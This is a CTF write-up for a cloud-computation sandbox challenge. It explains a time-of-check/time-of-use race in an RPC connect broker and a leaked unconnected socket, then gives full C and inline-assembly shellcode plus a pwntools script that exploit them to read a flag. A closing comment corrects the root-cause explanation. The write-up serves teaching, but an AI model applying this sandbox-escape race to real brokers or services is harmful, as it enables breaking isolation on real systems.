# Challenge Description

We realized that there was a distinct lack of cloud based computation services
and thus decided do create something new.

It is making use of the latest super-advanced security features of the linux
- 100% seccomp protection
- *ALL* the namespaces (wow!)
- rlimit thingies

We provide you with the source code as well as a demo instance so that you can
evaluate our high quality service.

nc caas.ctfcompetition.com 1337

# Prep Work

Lets start by seeing what the network service gives us upon connecting.
$ nc caas.ctfcompetition.com 1337
Welcome to the awesome cloud computation engine!
We will run your application* for you

Format: <u16 assembly length> <x64 assembly>

*) Some restrictions apply

Seems like we will need to be submitting binary data, so lets write a simple script to facilitate this.
from pwn import *

s = remote('caas.ctfcompetition.com', 1337)

payload = open('payload.bin', 'rb').read()
s.write(p16(len(payload)) + payload)

# Investigating the Source Code

We are also given the source code to the service that runs the challenge, so lets investigate this.

In `challenge.cc` we can see that the server sets up two ancillary services in the functions `MetadataServer` and `FlagServer`.

- `MetadataServer` listens on `` and simply replies with `Not implemented` to all connections
- `FlagServer` listens on `` and replies with the contents of a file named `flag` to all connections

We now have our end goal: write some shellcode that somehow connects to `` to receive the flag and print it to stdout.

Lets investigate the server a bit further to see exactly how our payload will be run.

Every incomming connection will call `handle_connection`, which forks.
- The child process runs our shellcode after being is heavily locked down
- The parent process sets up some timeouts and then finally calls `RPC::Server(child_pid, comms_fd)`

We will come back to the parent process later, but lets take a closer look at exactly how the child process that runs our shellcode is locked down.

The first observation is that the fork itself is done with a custom function `ForkWithFlags` which applies the given namespace flags to isolate the child process. As the challenge description promises, all the available namespaces are used. Most importantly given our end goal, the child process is put into its own network namespace.

Following the code further we can see that:
- we will have no filesystem (`pivot_root` into an empty directory)
- we will have no capabilities (`cap_set_proc` with default initialized capabilities)
- we will have almost no file descriptors (STDIN, STDOUT, STDERR and FD 100 are the only available to us)
- nearly all memory pages in the process will be unmapped, meaning we have access to no shared library code that would otherwise already by loaded into the process
- a seccomp policy will limit the syscalls we are allowed to use

## The Seccomp Policy

Using [david942j/seccomp-tools](https://github.com/david942j/seccomp-tools) we are able to decompile the binary seccomp policy from the source code and determine the restrictions placed upon us.

The following syscalls are allowed to be called unrestricted:
- read
- write
- close
- munmap
- sched_yield
- dup
- dup2
- nanosleep
- connect
- accept
- recvmsg
- bind
- exit
- exit_group

The following syscalls are allowed to be called with specific arguments:
- clone
- socket
- `socket(AF_INET, SOCK_STREAM, 0)`
- mmap
- `mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, 0, 0)`

## The RPC Server

The RPC interface is accessible to us over FD 100 and provides two functions:
- Connect
- GetEnvData

GetEnvData is entirely uninteresting and can be ignored. Connect also appears uninteresting at first glance because it whitelists the valid endpoints and does not allow connection to the flag server, but lets investigate further.

The Connect request recives data from our process with the following structure:
struct ConnectToMetadataServerRequest {
const char *hostname;
uint16_t port;

Immediately the `const char *` stands out - this means the RPC server has to peak into our memory to read the contents of the hostname string. This is done through a function called `SafeRead`, that we will revisit in a moment.

The RPC flow works as follows:
- read a request object from FD 100
- call `ValidateRequest` and bail on failure
- call `ExecuteRequest` and bail on failure
- write a response objet to FD 100
- optionally call `SendFD` to share a file descriptor between processes

Lets look at the validate/execute methods for the connect request:
template <>
bool ValidateRequest(pid_t pid, const ConnectToMetadataServerRequest &req) {
static constexpr std::pair<const char *, uint16_t> allowed_hosts[] = {
// Allow service to connect to the metadata service to obtain secrets etc.
{"", 8080}, // Early access.
// {"", 80}, // Full blown metadata service, not yet implemented
std::string host;
if (!SafeRead(pid, req.hostname, 4 * 3 + 3, &host)) {
return false;

fprintf(stderr, "host: %s port: %d\n", host.c_str(), req.port);

bool allowed = false;
for (const auto &p : allowed_hosts) {
if (!strcmp(p.first, host.c_str()) && p.second == req.port) {
allowed = true;

return allowed;

template <>
bool ExecuteRequest(pid_t pid, const ConnectToMetadataServerRequest &req, ConnectToMetadataServerResponse *res,
int *fd_to_send) {
std::string host;
if (!SafeRead(pid, req.hostname, 31, &host)) {
return false;

*fd_to_send = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in serv_addr = {};
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(req.port);

if (inet_pton(AF_INET, host.c_str(), &serv_addr.sin_addr.s_addr) != 1) {
fprintf(stderr, "inet_pton failed\n");
*fd_to_send = -1;
res->success = false;
} else if (connect(*fd_to_send, (struct sockaddr *)&serv_addr,
sizeof(sockaddr_in)) < 0) {
res->success = false;
} else {
res->success = true;
return true;

Picking this apart we can see that validate starts by calling `SafeRead` to retrieve the string value for the requested hostname, and then compares it along with the port number to a whitelist. Execute follows by again calling `SafeRead` to get the requested hostname before creating a socket and connecting it to the requested endpoint.

There are two critical bugs here:
- SafeRead is called twice, meaning there is a potential time of use vs time of check attack vector here
- The socket created is stored into `fd_to_send` even if the `connect` call returns an error.

The significance of the second bug is very subtle. The key point to understand is that a socket belongs to whatever network namespace it is created in. The namespace of the process calling `connect` is irrelevant. If our locked down process is given a socket file descriptor from outside our network namespace that is in an unconnected state we can use that socket to connect to as if we were not in a network namespace to begin with.

## SafeRead

The authors of this program had clearly given some thought to the dangers in reading another processes memory, and so implemented a "safe" read function to mitigate the dangers.

The implementation breaks down into the following three steps:
- verify that the other process is currently blocked on either the `read` or `recvmsg` syscall
- verify the other process only has a single thread
- call `process_vm_readv` to read the memory across process boundaries

## Exploiting the Bugs

We now have a relatively clear picture of the steps we need to take to get the flag:
1. send a connect request over rpc to an allowed endpoint so that we pass the checks in `ValidateRequest`
2. after passing validation checks, but before `ExecuteRequest` starts, swap out the hostname with an address that will not be connectable
3. receive the connect response, which should give us a socket fd in an unconnected state
4. connect this socket to ``, read the flag, and write it to stdout

Everything there is straight forward except step 2.
How do we get past the syscall blocking check in `SafeRead` if our process can't have multiple threads?

The answer lies in the `clone` syscall that is whitelisted in our seccomp filters. Lets take a look.

We are specifically allowed to call `clone` with the `CLONE_VM | CLONE_SIGHAND | CLONE_THREAD` flags.

At first glance `CLONE_THREAD` is discouraging, because it sounds like it will somehow create a thread instead of a child process and trigger the other check in `SafeRead`, but this is not the case. According to the man pages, `If CLONE_THREAD is set, the child is placed in the same thread group as the calling process.`

`CLONE_VM` is the last piece of the puzzle, as according to the man pages: `If CLONE_VM is set, the calling process and the child process run in the same memory space.`
This is perfect, as it will allow us to modify the hostname string from our child process *while our parent is still blocked on `read` and only has a single thread*.

# The Payload
We now have all the pieces, so lets assemble our payload. I chose to write the payload in C rather than fumbling about in assembly directly.

## Makefile
g++ -O2 -static -fPIE -nostdlib -nostartfiles payload.cc -o payload.elf
objcopy -O binary -R .note.* -R .eh_frame -R .comment payload.elf payload.bin

## Code
"jmp _start \n"

".global syscall \n"
"syscall: \n"
"movq %rdi, %Rax \n"
"movq %rsi, %rdi \n"
"movq %rdx, %rsi \n"
"movq %rcx, %rdx \n"
"movq %r8, %r10 \n"
"movq %r9, %r8 \n"
"movq 8(%rsp),%r9 \n"
"syscall \n"
"ret \n"

".global clone \n"
"clone: \n"
"sub $0x10,%rsi \n"
"mov %rcx,0x8(%rsi) \n"
"mov %rdi,(%rsi) \n"
"mov %rdx,%rdi \n"
"mov %r8,%rdx \n"
"mov %r9,%r8 \n"
"mov 0x8(%rsp),%r10 \n"
"mov $0x38,%eax \n"
"syscall \n"
"test %rax,%rax \n"
"je 1f \n"
"retq \n"
"1: \n"
"xor %ebp,%ebp \n"
"pop %rax \n"
"pop %rdi \n"
"callq *%rax \n"
"mov %rax,%rdi \n"
"mov $0x3c,%eax \n"
"syscall \n"

#include <linux/sched.h>
#include <netinet/in.h>
#include <syscall.h>
#include <unistd.h>

extern "C" {
void _start(void);
long int syscall(long int __sysno, ...);
int clone(int (*fn)(void *), void *child_stack, int flags, void *arg);

#define write(fd, buf, sz) syscall(SYS_write, fd, buf, sz)
#define read(fd, buf, sz) syscall(SYS_read, fd, buf, sz)
#define recvmsg(fd, msg, flags) syscall(SYS_recvmsg, fd, msg, flags)
#define nanosleep(rqtp, rmtp) syscall(SYS_nanosleep, rqtp, rmtp)
#define connect(fd, addr, addrlen) syscall(SYS_connect, fd, addr, addrlen)
#define mmap(addr, len, prot, flags, fd, off) syscall(SYS_mmap, addr, len, prot, flags, fd, off)
#define exit(code) syscall(SYS_exit, code)

struct ConnectToMetadataServerRequest {
const char *hostname;
uint16_t port;

struct ConnectToMetadataServerResponse {
bool success;

struct GetEnvironmentDataRequest {
uint8_t idx;

struct GetEnvironmentDataResponse {
uint64_t data;

namespace Type {
enum type_t {
Connect = 0,
GetEnvData = 1,

struct Request {
union {
ConnectToMetadataServerRequest connect_request;
GetEnvironmentDataRequest getenvdata_request;
} req;

Type::type_t type;

struct Response {
union {
ConnectToMetadataServerResponse connect_response;
GetEnvironmentDataResponse getenvdata_response;
} res;

Type::type_t type;

static int ReceiveFD(int comms_fd) {
char fd_msg[200];
cmsghdr *cmsg = reinterpret_cast<cmsghdr *>(fd_msg);

bool data;
iovec iov = {&data, sizeof(data)};

msghdr msg;
msg.msg_name = nullptr;
msg.msg_namelen = 0;
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = cmsg;
msg.msg_controllen = sizeof(fd_msg);
msg.msg_flags = 0;

if (recvmsg(comms_fd, &msg, 0) < 0) {
return -1;

cmsg = CMSG_FIRSTHDR(&msg;;
if (cmsg->cmsg_level == SOL_SOCKET && cmsg->cmsg_type == SCM_RIGHTS) {
if (cmsg->cmsg_len == CMSG_LEN(sizeof(int))) {
int *fds = reinterpret_cast<int *>(CMSG_DATA(cmsg));
return fds[0];

return -1;

void _sleep(long ns) {
struct timespec t = {};
t.tv_sec = 0;
t.tv_nsec = ns;
nanosleep(&t, nullptr);

int _child(void *arg) {
char* addr = (char*)arg;

// delay long enough for ValidateRequest to succeed

// modify the ip address to
// the address needs to still be valid, but not connectable
addr[0] = '2';

return 0;

void _start(void) {
// allocate stack for cloned process
char * stk = (char*)mmap(0, 0x1000, 3, 0x22, 0, 0);
if (!stk) {

char addr[] = "";

Request req;
req.req.connect_request.hostname = addr;
req.req.connect_request.port = 8080;
req.type = Type::Connect;

if (write(100, &req, sizeof(Request)) != sizeof(Request)) {

// clone ourselves to perform the attack
auto pid = clone(_child, stk + 0x1000, CLONE_VM | CLONE_SIGHAND | CLONE_THREAD, addr);
if (pid == -1) {

// delay a bit before blocking on read to ensure clone is ready

// read response
Response resp;
if (read(100, &resp, sizeof(Response)) != sizeof(Response)) {

// receive fd from connect request
auto fd = ReceiveFD(100);
if (fd != -1) {
// if the race worked, the socket fd we have now will not be connected
struct sockaddr_in serv_addr = {};
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = htonl(0x7f000001L);
serv_addr.sin_port = htons(6666);

// connect socket to
auto res = connect(fd, &serv_addr, sizeof(sockaddr_in));
if (res == 0) {
char buf[100];

// dump flag to stdout
auto len = read(fd, buf, sizeof(buf));
if (len > 0) {
write(STDOUT_FILENO, buf, len);


# Dumping the Flag

Build the payload
$ make
g++ -O2 -static -fPIE -nostdlib -nostartfiles payload.cc -o payload.elf
objcopy -O binary -R .note.* -R .eh_frame -R .comment payload.elf payload.bin

Execute the payload with our script from earlier
$ python do.py
[+] Opening connection to caas.ctfcompetition.com on port 1337: Done
[*] Closed connection to caas.ctfcompetition.com port 1337

Try again because race conditions aren't entirely reliable
$ python do.py
[+] Opening connection to caas.ctfcompetition.com on port 1337: Done
[*] Closed connection to caas.ctfcompetition.com port 1337

WGHJune 27, 2019, 2:48 p.m.

We were ridiculously close to solving the task. I investigated the bug and want to correct you a bit.

`CLONE_VM | CLONE_THREAD` actually does create a proper thread, and it is reported in "Threads" counter in procfs.

The bug in this challenge actually was that the thread check never worked. The ReadWholeFile function calculated the file size with `fseek(..., SEEK_END)` + `ftell(...)`, but it always returned 0 for procfs pseudofiles. It always returned an empty file, and thread number was always assumed to be 0.